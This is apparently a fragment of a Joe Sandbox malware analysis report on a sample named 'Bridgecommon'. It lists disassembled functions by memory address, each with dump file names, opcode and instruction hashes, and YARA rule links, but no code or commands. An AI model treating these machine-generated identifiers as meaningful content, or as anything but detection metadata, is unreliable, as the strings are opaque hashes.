                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                              Function 00007FFD9BB07489 Relevance: .0, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: adc8c1cc4189f6213beb4c47a9043b7249ccb8ad43b31e47a810099371ac5710
                                                                                              • Instruction ID: f7022e37af43f2e05e986e1a0cc446726f3858d82e436fa8ced5b60d6f119fd7
                                                                                              • Opcode Fuzzy Hash: adc8c1cc4189f6213beb4c47a9043b7249ccb8ad43b31e47a810099371ac5710
                                                                                              • Instruction Fuzzy Hash: 46E01A2294E7C04FC70B973588A98547F60AE1721474A40EBC085CF1F3E9299949C711
                                                                                              Function 00007FFD9BB0D4D9 Relevance: .0, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 071be711cb797368beb8756d0463c5fa29b116a5dfca29274390be4a16e0f005
                                                                                              • Instruction ID: c0e27e007c3273bfcd7392255f06bff471b2acec24bc275eef56d109f6faa75a
                                                                                              • Opcode Fuzzy Hash: 071be711cb797368beb8756d0463c5fa29b116a5dfca29274390be4a16e0f005
                                                                                              • Instruction Fuzzy Hash: FFE04F2194F7C04FC71B973488799547F60EF6721078A40EEC085CF5F3D9199949C702
                                                                                              Function 00007FFD9BB01C90 Relevance: .0, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                              • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                              • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                              • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                              Function 00007FFD9BB0B388 Relevance: .0, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                              • Instruction ID: a565302b9b7bcc34a1d7b6cb08a6a6e7b8abe4aeb70df905b6acc3b2f1e45e16
                                                                                              • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                              • Instruction Fuzzy Hash: B4D02230B518040FC70CA738885883433A0EB6A20A78140A8D00AC72F1D92AEC88C780
                                                                                              Function 00007FFD9BB06A90 Relevance: .0, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                                              • Instruction ID: 3ca3d89b2a44c1ccc83115d2dd53154f4f74bb52458d03ecdb794458fcb23236
                                                                                              • Opcode Fuzzy Hash: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                                              • Instruction Fuzzy Hash: 87D02230B548040FC70CA63A88588347390EB6A21A7C100A8D00AC72B5E92ADC88C740
                                                                                              Function 00007FFD9BAD06A5 Relevance: .0, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction ID: ee4550b84af7779471804bd44f4eca39960630772f8e243641bbcc622fd8accc
                                                                                              • Opcode Fuzzy Hash: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction Fuzzy Hash: 21C04C05F5B51F01F43577EE54760ACB5409BD5A10FD70372D50D840E19CED22D5815E
                                                                                              Function 00007FFD9BAD1310 Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction ID: ea4277a05fc08a7e60f9c3051bcf18043e5bf4e6c8f2dac607c17467776c4421
                                                                                              • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction Fuzzy Hash: 0CC08C3051180C8FC908EB28C88480433A0FB09300BC20090E009C7270E259DDC2C740
                                                                                              Function 00007FFD9BAE685C Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9fc9b510e5af2865465a5d954c3616059f56a3536e8610c4992970c647d53807
                                                                                              • Instruction ID: f8da5a9e1362491898b231de9de4a04fc36088ee84a5f58fa30ab4ca55fedd3c
                                                                                              • Opcode Fuzzy Hash: 9fc9b510e5af2865465a5d954c3616059f56a3536e8610c4992970c647d53807
                                                                                              • Instruction Fuzzy Hash: EED0C930D045298FDBA0DB5488907A876B1AF48310F5001F6800CE3285CA356D80DB50
                                                                                              Function 00007FFD9BAD4E17 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction ID: 0878ed8e344642cdfa69e7fdeaa9ca7b4371213ce7a24820e0fcb3aa192dbb57
                                                                                              • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction Fuzzy Hash: E0C08CA1E1820945E33487A048391AE73818F80220F928772805DA60A5EE6856429680
                                                                                              Function 00007FFD9BAD2555 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fde22caeb24bc52fe1a2af4b3dd1e8c107b4bc44bfbb090b1af4b94366b6c36c
                                                                                              • Instruction ID: f506ef59d37093b5a18cf1648a4bb6a6dda1a0a54a67d515f4aaadc7c492006d
                                                                                              • Opcode Fuzzy Hash: fde22caeb24bc52fe1a2af4b3dd1e8c107b4bc44bfbb090b1af4b94366b6c36c
                                                                                              • Instruction Fuzzy Hash: ACC04C01F1881E07F359671444316BE04C75F94768F5556B4E01E866DECD4C595117C7
                                                                                              Function 00007FFD9BAD06C8 Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction ID: a8191215b382f8a73f31a7feefe0008b463f6229fc6eb65d2ed8bfc4d80beb0f
                                                                                              • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction Fuzzy Hash: E5B01200E5740F00E43433FB08660A870409BC4100FC20270D40D8009198DD12944246

                                                                                              Non-executed Functions

                                                                                              Function 00007FFD9BAD09B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: c9$!k9$"s9$#{9
                                                                                              • API String ID: 0-1692736845
                                                                                              • Opcode ID: d7e52fd75661f17e29165b7474adbe63ab1d3a9785f96b054c9bf29c3b28f678
                                                                                              • Instruction ID: ee9c509b4009dccb547055694a689a46b815e2793af6bde88379d6cda017ce85
                                                                                              • Opcode Fuzzy Hash: d7e52fd75661f17e29165b7474adbe63ab1d3a9785f96b054c9bf29c3b28f678
                                                                                              • Instruction Fuzzy Hash: E7419F02B0952605E23A73FD78228FD6B449FA927FB4847B7F45E8D0EB4D096085C2E5